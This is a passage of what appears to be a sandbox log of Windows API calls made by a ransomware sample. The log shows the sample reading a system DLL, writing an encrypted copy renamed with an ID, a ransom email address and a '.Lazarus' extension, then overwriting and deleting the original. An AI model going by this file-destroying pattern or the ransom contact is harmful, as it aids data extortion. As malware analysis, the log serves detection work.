lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.105] GetFileType (hFile=0x360) returned 0x1 [0089.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.107] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0089.118] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0089.122] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0089.138] CloseHandle (hObject=0x360) returned 1 [0089.172] AreFileApisANSI () returned 1 [0089.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0089.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x4ebc8 [0089.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 94 [0089.172] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.172] GetFileType (hFile=0x360) returned 0x1 [0089.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.172] CloseHandle (hObject=0x360) returned 1 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0089.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0089.174] AreFileApisANSI () returned 1 [0089.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x4ebc8 [0089.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 94 [0089.174] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0)) returned 1 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.174] AreFileApisANSI () returned 1 [0089.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0089.175] GetLastError () returned 0x0 [0089.175] SetLastError (dwErrCode=0x0) [0089.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dee0 [0089.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8e440 [0089.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c288 [0089.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d750 [0089.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0089.175] GetLastError () returned 0x0 [0089.175] SetLastError (dwErrCode=0x0) [0089.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0089.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0089.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x60138 [0089.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0089.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0089.175] AreFileApisANSI () returned 1 [0089.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x60138, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0089.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x138) returned 0x4e568 [0089.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x60138, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=156 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 156 [0089.175] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.176] GetFileType (hFile=0x360) returned 0x1 [0089.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0089.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0089.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0089.177] AreFileApisANSI () returned 1 [0089.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0089.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x4ebc8 [0089.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 94 [0089.177] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0089.177] GetFileType (hFile=0x348) returned 0x1 [0089.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0089.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0089.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0089.177] GetLastError () returned 0x0 [0089.177] SetLastError (dwErrCode=0x0) [0089.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0089.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0089.177] GetLastError () returned 0x0 [0089.177] SetLastError (dwErrCode=0x0) [0089.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0089.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0089.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f658 [0089.177] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0089.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0089.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0089.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x48c98 [0089.180] GetLastError () returned 0x0 [0089.180] SetLastError (dwErrCode=0x0) [0089.180] GetLastError () returned 0x0 [0089.180] SetLastError (dwErrCode=0x0) [0089.181] GetLastError () returned 0x0 [0089.181] SetLastError (dwErrCode=0x0) [0089.181] GetLastError () returned 0x0 [0089.181] SetLastError (dwErrCode=0x0) [0089.181] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.181] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.182] GetLastError () returned 0x0 [0089.182] SetLastError (dwErrCode=0x0) [0089.182] GetLastError () returned 0x0 [0089.182] SetLastError (dwErrCode=0x0) [0089.182] GetLastError () returned 0x0 [0089.182] SetLastError (dwErrCode=0x0) [0089.182] GetLastError () returned 0x0 [0089.182] SetLastError (dwErrCode=0x0) [0089.183] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.183] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.183] GetLastError () returned 0x0 [0089.183] SetLastError (dwErrCode=0x0) [0089.183] GetLastError () returned 0x0 [0089.183] SetLastError (dwErrCode=0x0) [0089.183] GetLastError () returned 0x0 [0089.183] SetLastError (dwErrCode=0x0) [0089.183] GetLastError () returned 0x0 [0089.183] SetLastError (dwErrCode=0x0) [0089.183] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.184] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.184] GetLastError () returned 0x0 [0089.184] SetLastError (dwErrCode=0x0) [0089.184] GetLastError () returned 0x0 [0089.184] SetLastError (dwErrCode=0x0) [0089.184] GetLastError () returned 0x0 [0089.184] SetLastError (dwErrCode=0x0) [0089.184] GetLastError () returned 0x0 [0089.184] SetLastError (dwErrCode=0x0) [0089.184] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x8c0, lpOverlapped=0x0) returned 1 [0089.185] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.185] GetLastError () returned 0x0 [0089.185] SetLastError (dwErrCode=0x0) [0089.185] GetLastError () returned 0x0 [0089.185] SetLastError (dwErrCode=0x0) [0089.185] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0089.185] GetLastError () returned 0x0 [0089.185] SetLastError (dwErrCode=0x0) [0089.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0089.185] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327ef70*=0x8c0, lpOverlapped=0x0) returned 1 [0089.185] GetLastError () returned 0x0 [0089.186] SetLastError (dwErrCode=0x0) [0089.186] GetLastError () returned 0x0 [0089.186] SetLastError (dwErrCode=0x0) [0089.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0089.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0089.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0089.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0089.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x48c98 | out: hHeap=0x20000) returned 1 [0089.186] CloseHandle (hObject=0x360) returned 1 [0089.187] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f658 | out: hHeap=0x20000) returned 1 [0089.187] CloseHandle (hObject=0x348) returned 1 [0089.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0089.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0089.188] AreFileApisANSI () returned 1 [0089.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0089.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x4ebc8 [0089.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 94 [0089.188] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0089.189] GetFileType (hFile=0x348) returned 0x1 [0089.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f658 [0089.189] GetLastError () returned 0xb7 [0089.189] SetLastError (dwErrCode=0xb7) [0089.189] WriteFile (in: hFile=0x348, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0089.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f658 | out: hHeap=0x20000) returned 1 [0089.190] CloseHandle (hObject=0x348) returned 1 [0089.190] AreFileApisANSI () returned 1 [0089.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0089.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x4ebc8 [0089.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 94 [0089.191] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll")) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0089.192] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.192] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.192] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x1, dwReserved1=0x202f8, cFileName="api-ms-win-core-xstate-l2-1-0.dll", cAlternateFileName="APA632~1.DLL")) returned 1 [0089.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.192] 